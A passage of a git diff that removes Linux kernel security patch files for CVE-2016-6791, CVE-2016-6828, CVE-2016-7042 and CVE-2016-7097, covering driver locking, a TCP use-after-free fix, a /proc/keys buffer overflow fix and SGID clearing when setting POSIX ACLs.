-@@ -1360,8 +1369,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		pr_debug("%s[%p]:AUDIO_DEREGISTER_ION\n", __func__, audio);
- 		if (copy_from_user(&info, (void *)arg, sizeof(info)))
- 			rc = -EFAULT;
--		else
-+		else{
-+                        mutex_lock(&audio->read_lock);
-+                        mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_remove(audio, &info);
-+                        mutex_unlock(&audio->write_lock);
-+                        mutex_unlock(&audio->read_lock);
-+		}
- 		mutex_unlock(&audio->lock);
- 		break;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6791/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-6791/ANY/0002.patch
deleted file mode 100644
index 01fe5416..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6791/ANY/0002.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From 62580295210b6c0bd809cde7088b45ebb65ace79 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Wed, 28 Sep 2016 20:11:23 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 22 +++++++++++++++++++++-
- 1 file changed, 21 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 8041111..7a4bae3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -570,6 +570,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	struct q6audio_aio *audio = file->private_data;
- 	pr_debug("%s[%p]\n", __func__, audio);
- 	mutex_lock(&audio->lock);
-+	mutex_lock(&audio->read_lock);
-+	mutex_lock(&audio->write_lock);
- 	audio->wflush = 1;
- 	if (audio->enabled)
- 		audio_aio_flush(audio);
-@@ -584,6 +586,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	wake_up(&audio->event_wait);
- 	audio_aio_reset_event_queue(audio);
- 	q6asm_audio_client_free(audio->ac);
-+	mutex_unlock(&audio->write_lock);
-+	mutex_unlock(&audio->read_lock);
- 	mutex_unlock(&audio->lock);
- 	mutex_destroy(&audio->lock);
- 	mutex_destroy(&audio->read_lock);
-@@ -1679,7 +1683,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- 				__func__);
- 			rc = -EFAULT;
- 		} else {
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_add(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
-@@ -1694,7 +1702,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- 				__func__);
- 			rc = -EFAULT;
- 		} else {
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_remove(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
-@@ -1996,7 +2008,11 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 		} else {
- 			info.fd = info_32.fd;
- 			info.vaddr = compat_ptr(info_32.vaddr);
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_add(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
-@@ -2013,7 +2029,11 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- 		} else {
- 			info.fd = info_32.fd;
- 			info.vaddr = compat_ptr(info_32.vaddr);
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_remove(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
- 		}
- 		mutex_unlock(&audio->lock);
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6828/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6828/ANY/0001.patch
deleted file mode 100644
index e2ec7d0b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6828/ANY/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From bb1fceca22492109be12640d49f5ea5a544c6bb4 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Wed, 17 Aug 2016 05:56:26 -0700
-Subject: tcp: fix use after free in tcp_xmit_retransmit_queue()
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
-tail of the write queue using tcp_add_write_queue_tail()
-
-Then it attempts to copy user data into this fresh skb.
-
-If the copy fails, we undo the work and remove the fresh skb.
-
-Unfortunately, this undo lacks the change done to tp->highest_sack and
-we can leave a dangling pointer (to a freed skb)
-
-Later, tcp_xmit_retransmit_queue() can dereference this pointer and
-access freed memory. For regular kernels where memory is not unmapped,
-this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
-returning garbage instead of tp->snd_nxt, but with various debug
-features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
-
-This bug was found by Marco Grassi thanks to syzkaller.
-
-Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
-Reported-by: Marco Grassi <marco.gra@gmail.com>
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
-Cc: Yuchung Cheng <ycheng@google.com>
-Cc: Neal Cardwell <ncardwell@google.com>
-Acked-by: Neal Cardwell <ncardwell@google.com>
-Reviewed-by: Cong Wang <xiyou.wangcong@gmail.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- include/net/tcp.h | 2 ++
- 1 file changed, 2 insertions(+)
-
-(limited to 'include/net/tcp.h')
-
-diff --git a/include/net/tcp.h b/include/net/tcp.h
-index c00e7d5..7717302 100644
---- a/include/net/tcp.h
-+++ b/include/net/tcp.h
-@@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
- {
- 	if (sk->sk_send_head == skb_unlinked)
- 		sk->sk_send_head = NULL;
-+	if (tcp_sk(sk)->highest_sack == skb_unlinked)
-+		tcp_sk(sk)->highest_sack = NULL;
- }
- 
- static inline void tcp_init_send_head(struct sock *sk)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7042/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7042/ANY/0001.patch
deleted file mode 100644
index 7c96fe4f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7042/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 03dab869b7b239c4e013ec82aea22e181e441cfc Mon Sep 17 00:00:00 2001
-From: David Howells <dhowells@redhat.com>
-Date: Wed, 26 Oct 2016 15:01:54 +0100
-Subject: KEYS: Fix short sprintf buffer in /proc/keys show function
-
-This fixes CVE-2016-7042.
-
-Fix a short sprintf buffer in proc_keys_show().  If the gcc stack protector
-is turned on, this can cause a panic due to stack corruption.
-
-The problem is that xbuf[] is not big enough to hold a 64-bit timeout
-rendered as weeks:
-
-	(gdb) p 0xffffffffffffffffULL/(60*60*24*7)
-	$2 = 30500568904943
-
-That's 14 chars plus NUL, not 11 chars plus NUL.
-
-Expand the buffer to 16 chars.
-
-I think the unpatched code apparently works if the stack-protector is not
-enabled because on a 32-bit machine the buffer won't be overflowed and on a
-64-bit machine there's a 64-bit aligned pointer at one side and an int that
-isn't checked again on the other side.
-
-The panic incurred looks something like:
-
-Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: ffffffff81352ebe
-CPU: 0 PID: 1692 Comm: reproducer Not tainted 4.7.2-201.fc24.x86_64 #1
-Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011
- 0000000000000086 00000000fbbd2679 ffff8800a044bc00 ffffffff813d941f
- ffffffff81a28d58 ffff8800a044bc98 ffff8800a044bc88 ffffffff811b2cb6
- ffff880000000010 ffff8800a044bc98 ffff8800a044bc30 00000000fbbd2679
-Call Trace:
- [<ffffffff813d941f>] dump_stack+0x63/0x84
- [<ffffffff811b2cb6>] panic+0xde/0x22a
- [<ffffffff81352ebe>] ? proc_keys_show+0x3ce/0x3d0
- [<ffffffff8109f7f9>] __stack_chk_fail+0x19/0x30
- [<ffffffff81352ebe>] proc_keys_show+0x3ce/0x3d0
- [<ffffffff81350410>] ? key_validate+0x50/0x50
- [<ffffffff8134db30>] ? key_default_cmp+0x20/0x20
- [<ffffffff8126b31c>] seq_read+0x2cc/0x390
- [<ffffffff812b6b12>] proc_reg_read+0x42/0x70
- [<ffffffff81244fc7>] __vfs_read+0x37/0x150
- [<ffffffff81357020>] ? security_file_permission+0xa0/0xc0
- [<ffffffff81246156>] vfs_read+0x96/0x130
- [<ffffffff81247635>] SyS_read+0x55/0xc0
- [<ffffffff817eb872>] entry_SYSCALL_64_fastpath+0x1a/0xa4
-
-Reported-by: Ondrej Kozina <okozina@redhat.com>
-Signed-off-by: David Howells <dhowells@redhat.com>
-Tested-by: Ondrej Kozina <okozina@redhat.com>
-cc: stable@vger.kernel.org
-Signed-off-by: James Morris <james.l.morris@oracle.com>
----
- security/keys/proc.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/security/keys/proc.c b/security/keys/proc.c
-index f0611a6..b9f531c 100644
---- a/security/keys/proc.c
-+++ b/security/keys/proc.c
-@@ -181,7 +181,7 @@ static int proc_keys_show(struct seq_file *m, void *v)
- 	struct timespec now;
- 	unsigned long timo;
- 	key_ref_t key_ref, skey_ref;
--	char xbuf[12];
-+	char xbuf[16];
- 	int rc;
- 
- 	struct keyring_search_context ctx = {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7097/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-7097/3.10/0002.patch
deleted file mode 100644
index 8beb5150..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7097/3.10/0002.patch
+++ /dev/null
@@ -1,425 +0,0 @@
-From 6b0c893dc08060d6999b07136391d8a298678dae Mon Sep 17 00:00:00 2001
-From: Jan Kara <jack@suse.cz>
-Date: Mon, 19 Sep 2016 17:39:09 +0200
-Subject: [PATCH] BACKPORT: posix_acl: Clear SGID bit when setting file
- permissions
-
-(cherry pick from commit 073931017b49d9458aa351605b43a7e34598caef)
-
-When file permissions are modified via chmod(2) and the user is not in
-the owning group or capable of CAP_FSETID, the setgid bit is cleared in
-inode_change_ok().  Setting a POSIX ACL via setxattr(2) sets the file
-permissions as well as the new ACL, but doesn't clear the setgid bit in
-a similar way; this allows to bypass the check in chmod(2).  Fix that.
-
-NB: conflicts resolution included extending the change to all visible
-    users of the near deprecated function posix_acl_equiv_mode
-    replaced with posix_acl_update_mode. We did not resolve the ACL
-    leak in this CL, require additional upstream fixes.
-
-References: CVE-2016-7097
-Reviewed-by: Christoph Hellwig <hch@lst.de>
-Reviewed-by: Jeff Layton <jlayton@redhat.com>
-Signed-off-by: Jan Kara <jack@suse.cz>
-Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
-Bug: 32458736
-Change-Id: I19591ad452cc825ac282b3cfd2daaa72aa9a1ac1
----
- fs/9p/acl.c               | 40 +++++++++++++++++-----------------------
- fs/btrfs/acl.c            |  6 ++----
- fs/ext2/acl.c             | 12 ++++--------
- fs/ext3/acl.c             | 12 ++++--------
- fs/ext4/acl.c             | 12 ++++--------
- fs/f2fs/acl.c             |  6 ++----
- fs/generic_acl.c          |  8 ++------
- fs/gfs2/acl.c             | 11 +++--------
- fs/jffs2/acl.c            |  9 ++++-----
- fs/jfs/xattr.c            |  6 +++---
- fs/ocfs2/acl.c            | 18 ++++++------------
- fs/posix_acl.c            | 31 +++++++++++++++++++++++++++++++
- fs/reiserfs/xattr_acl.c   |  8 ++------
- fs/xfs/xfs_acl.c          | 13 +++----------
- include/linux/posix_acl.h |  1 +
- 15 files changed, 88 insertions(+), 105 deletions(-)
-
-diff --git a/fs/9p/acl.c b/fs/9p/acl.c
-index 7af425f53beef..9686c1f17653f 100644
---- a/fs/9p/acl.c
-+++ b/fs/9p/acl.c
-@@ -320,32 +320,26 @@ static int v9fs_xattr_set_acl(struct dentry *dentry, const char *name,
- 	case ACL_TYPE_ACCESS:
- 		name = POSIX_ACL_XATTR_ACCESS;
- 		if (acl) {
--			umode_t mode = inode->i_mode;
--			retval = posix_acl_equiv_mode(acl, &mode);
--			if (retval < 0)
-+			struct iattr iattr;
-+
-+			retval = posix_acl_update_mode(inode, &iattr.ia_mode, &acl);
-+			if (retval)
- 				goto err_out;
--			else {
--				struct iattr iattr;
--				if (retval == 0) {
--					/*
--					 * ACL can be represented
--					 * by the mode bits. So don't
--					 * update ACL.
--					 */
--					acl = NULL;
--					value = NULL;
--					size = 0;
--				}
--				/* Updte the mode bits */
--				iattr.ia_mode = ((mode & S_IALLUGO) |
--						 (inode->i_mode & ~S_IALLUGO));
--				iattr.ia_valid = ATTR_MODE;
--				/* FIXME should we update ctime ?
--				 * What is the following setxattr update the
--				 * mode ?
-+			if (!acl) {
-+				/*
-+				 * ACL can be represented
-+				 * by the mode bits. So don't
-+				 * update ACL.
- 				 */
--				v9fs_vfs_setattr_dotl(dentry, &iattr);
-+				value = NULL;
-+				size = 0;
- 			}
-+			iattr.ia_valid = ATTR_MODE;
-+			/* FIXME should we update ctime ?
-+			 * What is the following setxattr update the
-+			 * mode ?
-+			 */
-+			v9fs_vfs_setattr_dotl(dentry, &iattr);
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/btrfs/acl.c b/fs/btrfs/acl.c
-index 0890c83643e94..d6d53e5e7945d 100644
---- a/fs/btrfs/acl.c
-+++ b/fs/btrfs/acl.c
-@@ -118,11 +118,9 @@ static int btrfs_set_acl(struct btrfs_trans_handle *trans,
- 	case ACL_TYPE_ACCESS:
- 		name = POSIX_ACL_XATTR_ACCESS;
- 		if (acl) {
--			ret = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (ret < 0)
-+			ret = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (ret)
- 				return ret;
--			if (ret == 0)
--				acl = NULL;
- 		}
- 		ret = 0;
- 		break;
-diff --git a/fs/ext2/acl.c b/fs/ext2/acl.c
-index 110b6b371a4ed..48c3c2d7d2619 100644
---- a/fs/ext2/acl.c
-+++ b/fs/ext2/acl.c
-@@ -206,15 +206,11 @@ ext2_set_acl(struct inode *inode, int type, struct posix_acl *acl)
- 		case ACL_TYPE_ACCESS:
- 			name_index = EXT2_XATTR_INDEX_POSIX_ACL_ACCESS;
- 			if (acl) {
--				error = posix_acl_equiv_mode(acl, &inode->i_mode);
--				if (error < 0)
-+				error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+				if (error)
- 					return error;
--				else {
--					inode->i_ctime = CURRENT_TIME_SEC;
--					mark_inode_dirty(inode);
--					if (error == 0)
--						acl = NULL;
--				}
-+				inode->i_ctime = CURRENT_TIME_SEC;
-+				mark_inode_dirty(inode);
- 			}
- 			break;
- 
-diff --git a/fs/ext3/acl.c b/fs/ext3/acl.c
-index dbb5ad59a7fc3..bb2f60a62d82a 100644
---- a/fs/ext3/acl.c
-+++ b/fs/ext3/acl.c
-@@ -205,15 +205,11 @@ ext3_set_acl(handle_t *handle, struct inode *inode, int type,
- 		case ACL_TYPE_ACCESS:
- 			name_index = EXT3_XATTR_INDEX_POSIX_ACL_ACCESS;
- 			if (acl) {
--				error = posix_acl_equiv_mode(acl, &inode->i_mode);
--				if (error < 0)
-+				error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+				if (error)
- 					return error;
--				else {
--					inode->i_ctime = CURRENT_TIME_SEC;
--					ext3_mark_inode_dirty(handle, inode);
--					if (error == 0)
--						acl = NULL;
--				}
-+				inode->i_ctime = CURRENT_TIME_SEC;
-+				ext3_mark_inode_dirty(handle, inode);
- 			}
- 			break;
- 
-diff --git a/fs/ext4/acl.c b/fs/ext4/acl.c
-index d40c8dbbb0d66..87d9bbf6a53f3 100644
---- a/fs/ext4/acl.c
-+++ b/fs/ext4/acl.c
-@@ -201,15 +201,11 @@ __ext4_set_acl(handle_t *handle, struct inode *inode, int type,
- 	case ACL_TYPE_ACCESS:
- 		name_index = EXT4_XATTR_INDEX_POSIX_ACL_ACCESS;
- 		if (acl) {
--			error = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (error < 0)
-+			error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (error)
- 				return error;
--			else {
--				inode->i_ctime = ext4_current_time(inode);
--				ext4_mark_inode_dirty(handle, inode);
--				if (error == 0)
--					acl = NULL;
--			}
-+			inode->i_ctime = ext4_current_time(inode);
-+			ext4_mark_inode_dirty(handle, inode);
- 		}
- 		break;
- 
-diff --git a/fs/f2fs/acl.c b/fs/f2fs/acl.c
-index 44abc2f286e00..9c4f3c732bce4 100644
---- a/fs/f2fs/acl.c
-+++ b/fs/f2fs/acl.c
-@@ -223,12 +223,10 @@ static int f2fs_set_acl(struct inode *inode, int type, struct posix_acl *acl)
- 	case ACL_TYPE_ACCESS:
- 		name_index = F2FS_XATTR_INDEX_POSIX_ACL_ACCESS;
- 		if (acl) {
--			error = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (error < 0)
-+			error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (error)
- 				return error;
- 			set_acl_inode(fi, inode->i_mode);
--			if (error == 0)
--				acl = NULL;
- 		}
- 		break;
- 
-diff --git a/fs/generic_acl.c b/fs/generic_acl.c
-index b3f3676796d31..21408084c3b34 100644
---- a/fs/generic_acl.c
-+++ b/fs/generic_acl.c
-@@ -87,14 +87,10 @@ generic_acl_set(struct dentry *dentry, const char *name, const void *value,
- 			goto failed;
- 		switch (type) {
- 		case ACL_TYPE_ACCESS:
--			error = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (error < 0)
-+			error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (error)
- 				goto failed;
- 			inode->i_ctime = CURRENT_TIME;
--			if (error == 0) {
--				posix_acl_release(acl);
--				acl = NULL;
--			}
- 			break;
- 		case ACL_TYPE_DEFAULT:
- 			if (!S_ISDIR(inode->i_mode)) {
-diff --git a/fs/gfs2/acl.c b/fs/gfs2/acl.c
-index f69ac0af5496c..e7b330ef4dfda 100644
---- a/fs/gfs2/acl.c
-+++ b/fs/gfs2/acl.c
-@@ -268,15 +268,10 @@ static int gfs2_xattr_system_set(struct dentry *dentry, const char *name,
- 
- 	if (type == ACL_TYPE_ACCESS) {
- 		umode_t mode = inode->i_mode;
--		error = posix_acl_equiv_mode(acl, &mode);
-+		error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
- 
--		if (error <= 0) {
--			posix_acl_release(acl);
--			acl = NULL;
--
--			if (error < 0)
--				return error;
--		}
-+		if (error)
-+			goto out_release;
- 
- 		error = gfs2_set_mode(inode, mode);
- 		if (error)
-diff --git a/fs/jffs2/acl.c b/fs/jffs2/acl.c
-index 223283c301116..9335b8d3cf521 100644
---- a/fs/jffs2/acl.c
-+++ b/fs/jffs2/acl.c
-@@ -243,9 +243,10 @@ static int jffs2_set_acl(struct inode *inode, int type, struct posix_acl *acl)
- 	case ACL_TYPE_ACCESS:
- 		xprefix = JFFS2_XPREFIX_ACL_ACCESS;
- 		if (acl) {
--			umode_t mode = inode->i_mode;
--			rc = posix_acl_equiv_mode(acl, &mode);
--			if (rc < 0)
-+			umode_t mode;
-+
-+			rc = posix_acl_update_mode(inode, &mode, &acl);
-+			if (rc)
- 				return rc;
- 			if (inode->i_mode != mode) {
- 				struct iattr attr;
-@@ -257,8 +258,6 @@ static int jffs2_set_acl(struct inode *inode, int type, struct posix_acl *acl)
- 				if (rc < 0)
- 					return rc;
- 			}
--			if (rc == 0)
--				acl = NULL;
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/jfs/xattr.c b/fs/jfs/xattr.c
-index 42d67f9757bf6..c79b1d7a53e24 100644
---- a/fs/jfs/xattr.c
-+++ b/fs/jfs/xattr.c
-@@ -693,11 +693,11 @@ static int can_set_system_xattr(struct inode *inode, const char *name,
- 			return rc;
- 		}
- 		if (acl) {
--			rc = posix_acl_equiv_mode(acl, &inode->i_mode);
-+			rc = posix_acl_update_mode(inode, &inode->i_mode, &acl);
- 			posix_acl_release(acl);
--			if (rc < 0) {
-+			if (rc) {
- 				printk(KERN_ERR
--				       "posix_acl_equiv_mode returned %d\n",
-+				       "posix_acl_update_mode returned %d\n",
- 				       rc);
- 				return rc;
- 			}
-diff --git a/fs/ocfs2/acl.c b/fs/ocfs2/acl.c
-index 8a404576fb265..2fe643160cf73 100644
---- a/fs/ocfs2/acl.c
-+++ b/fs/ocfs2/acl.c
-@@ -275,19 +275,13 @@ static int ocfs2_set_acl(handle_t *handle,
- 		name_index = OCFS2_XATTR_INDEX_POSIX_ACL_ACCESS;
- 		if (acl) {
- 			umode_t mode = inode->i_mode;
--			ret = posix_acl_equiv_mode(acl, &mode);
--			if (ret < 0)
-+			ret = posix_acl_update_mode(inode, &mode, &acl);
-+			if (ret)
-+				return ret;
-+			ret = ocfs2_acl_set_mode(inode, di_bh,
-+						 handle, mode);
-+			if (ret)
- 				return ret;
--			else {
--				if (ret == 0)
--					acl = NULL;
--
--				ret = ocfs2_acl_set_mode(inode, di_bh,
--							 handle, mode);
--				if (ret)
--					return ret;
--
--			}
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/posix_acl.c b/fs/posix_acl.c
-index 3542f1f814e2a..35cc1f40b82df 100644
---- a/fs/posix_acl.c
-+++ b/fs/posix_acl.c
-@@ -341,6 +341,37 @@ static int posix_acl_create_masq(struct posix_acl *acl, umode_t *mode_p)
-         return not_equiv;
- }
- 
-+/**
-+ * posix_acl_update_mode  -  update mode in set_acl
-+ *
-+ * Update the file mode when setting an ACL: compute the new file permission
-+ * bits based on the ACL.  In addition, if the ACL is equivalent to the new
-+ * file mode, set *acl to NULL to indicate that no ACL should be set.
-+ *
-+ * As with chmod, clear the setgit bit if the caller is not in the owning group
-+ * or capable of CAP_FSETID (see inode_change_ok).
-+ *
-+ * Called from set_acl inode operations.
-+ */
-+int posix_acl_update_mode(struct inode *inode, umode_t *mode_p,
-+			  struct posix_acl **acl)
-+{
-+	umode_t mode = inode->i_mode;
-+	int error;
-+
-+	error = posix_acl_equiv_mode(*acl, &mode);
-+	if (error < 0)
-+		return error;
-+	if (error == 0)
-+		*acl = NULL;
-+	if (!in_group_p(inode->i_gid) &&
-+	    !capable_wrt_inode_uidgid(inode, CAP_FSETID))
-+		mode &= ~S_ISGID;
-+	*mode_p = mode;
-+	return 0;
-+}
-+EXPORT_SYMBOL(posix_acl_update_mode);
-+
- /*
-  * Modify the ACL for the chmod syscall.
-  */
-diff --git a/fs/reiserfs/xattr_acl.c b/fs/reiserfs/xattr_acl.c
-index 6c8767fdfc6a2..2d73589f37d64 100644
---- a/fs/reiserfs/xattr_acl.c
-+++ b/fs/reiserfs/xattr_acl.c
-@@ -286,13 +286,9 @@ reiserfs_set_acl(struct reiserfs_transaction_handle *th, struct inode *inode,
- 	case ACL_TYPE_ACCESS:
- 		name = POSIX_ACL_XATTR_ACCESS;
- 		if (acl) {
--			error = posix_acl_equiv_mode(acl, &inode->i_mode);
--			if (error < 0)
-+			error = posix_acl_update_mode(inode, &inode->i_mode, &acl);
-+			if (error)
- 				return error;
--			else {
--				if (error == 0)
--					acl = NULL;
--			}
- 		}
- 		break;
- 	case ACL_TYPE_DEFAULT:
-diff --git a/fs/xfs/xfs_acl.c b/fs/xfs/xfs_acl.c
-index 306d883d89bc7..4f8e4770229cf 100644
---- a/fs/xfs/xfs_acl.c
-+++ b/fs/xfs/xfs_acl.c
-@@ -389,16 +389,9 @@ xfs_xattr_acl_set(struct dentry *dentry, const char *name,
- 
- 	if (type == ACL_TYPE_ACCESS) {
- 		umode_t mode = inode->i_mode;
--		error = posix_acl_equiv_mode(acl, &mode);
--
--		if (error <= 0) {
--			posix_acl_release(acl);
--			acl = NULL;
--
--			if (error < 0)
--				return error;
--		}
--
-+		error = posix_acl_update_mode(inode, &mode, &acl);
-+		if (error)
-+			goto out_release;
- 		error = xfs_set_mode(inode, mode);
- 		if (error)
- 			goto out_release;
-diff --git a/include/linux/posix_acl.h b/include/linux/posix_acl.h
-index 7931efe711755..2ae0bba45f124 100644
---- a/include/linux/posix_acl.h
-+++ b/include/linux/posix_acl.h
-@@ -90,6 +90,7 @@ extern struct posix_acl *posix_acl_from_mode(umode_t, gfp_t);
- extern int posix_acl_equiv_mode(const struct posix_acl *, umode_t *);
- extern int posix_acl_create(struct posix_acl **, gfp_t, umode_t *);
- extern int posix_acl_chmod(struct posix_acl **, gfp_t, umode_t);
-+extern int posix_acl_update_mode(struct inode *, umode_t *, struct posix_acl **);
- 
- extern struct posix_acl *get_posix_acl(struct inode *, int);
- extern int set_posix_acl(struct inode *, int, struct posix_acl *);
diff --git a/Patches/Linux_CVEs/CVE-2016-7097/3.10/0003.patch b/Patches/Linux_CVEs/CVE-2016-7097/3.10/0003.patch
deleted file mode 100644
index 3afc1919..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7097/3.10/0003.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From aedf77d56472d1fddf050c61c1017d4f51149fb1 Mon Sep 17 00:00:00 2001
-From: Cong Wang <xiyou.wangcong@gmail.com>
-Date: Tue, 13 Dec 2016 10:33:34 -0800
-Subject: [PATCH] FROMLIST: 9p: fix a potential acl leak
-
-(https://lkml.org/lkml/2016/12/13/579)
-
-posix_acl_update_mode() could possibly clear 'acl', if so
-we leak the memory pointed by 'acl'. Save this pointer
-before calling posix_acl_update_mode() and release the memory
-if 'acl' really gets cleared.
-
-Reported-by: Mark Salyzyn <salyzyn@android.com>
-Reviewed-by: Jan Kara <jack@suse.cz>
-Reviewed-by: Greg Kurz <groug@kaod.org>
-Cc: Eric Van Hensbergen <ericvh@gmail.com>
-Cc: Ron Minnich <rminnich@sandia.gov>
-Cc: Latchesar Ionkov <lucho@ionkov.net>
-Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
-Bug: 32458736
-Change-Id: Ia78da401e6fd1bfd569653bd2cd0ebd3f9c737a0
----
- fs/9p/acl.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/9p/acl.c b/fs/9p/acl.c
-index 9686c1f17653f..c19a66472d2eb 100644
---- a/fs/9p/acl.c
-+++ b/fs/9p/acl.c
-@@ -321,6 +321,7 @@ static int v9fs_xattr_set_acl(struct dentry *dentry, const char *name,
- 		name = POSIX_ACL_XATTR_ACCESS;
- 		if (acl) {
- 			struct iattr iattr;
-+			struct posix_acl *old_acl = acl;
- 
- 			retval = posix_acl_update_mode(inode, &iattr.ia_mode, &acl);
- 			if (retval)
-@@ -331,6 +332,7 @@ static int v9fs_xattr_set_acl(struct dentry *dentry, const char *name,
- 				 * by the mode bits. So don't
- 				 * update ACL.
- 				 */
-+				posix_acl_release(old_acl);
- 				value = NULL;
- 				size = 0;
- 			}
diff --git a/Patches/Linux_CVEs/CVE-2016-7097/^4.8/0001.patch b/Patches/Linux_CVEs/CVE-2016-7097/^4.8/0001.patch
deleted file mode 100644
index 94a7cfe6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7097/^4.8/0001.patch
+++ /dev/null
@@ -1,436 +0,0 @@
-From 073931017b49d9458aa351605b43a7e34598caef Mon Sep 17 00:00:00 2001
-From: Jan Kara <jack@suse.cz>
-Date: Mon, 19 Sep 2016 17:39:09 +0200
-Subject: posix_acl: Clear SGID bit when setting file permissions
-
-When file permissions are modified via chmod(2) and the user is not in
-the owning group or capable of CAP_FSETID, the setgid bit is cleared in
-inode_change_ok().  Setting a POSIX ACL via setxattr(2) sets the file
-permissions as well as the new ACL, but doesn't clear the setgid bit in
-a similar way; this allows to bypass the check in chmod(2).  Fix that.
-
-References: CVE-2016-7097
-Reviewed-by: Christoph Hellwig <hch@lst.de>
-Reviewed-by: Jeff Layton <jlayton@redhat.com>
-Signed-off-by: Jan Kara <jack@suse.cz>
-Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
----
- fs/9p/acl.c               | 40 +++++++++++++++++-----------------------
- fs/btrfs/acl.c            |  6 ++----
- fs/ceph/acl.c             |  6 ++----
- fs/ext2/acl.c             | 12 ++++--------
- fs/ext4/acl.c             | 12 ++++--------
- fs/f2fs/acl.c             |  6 ++----
- fs/gfs2/acl.c             | 12 +++---------
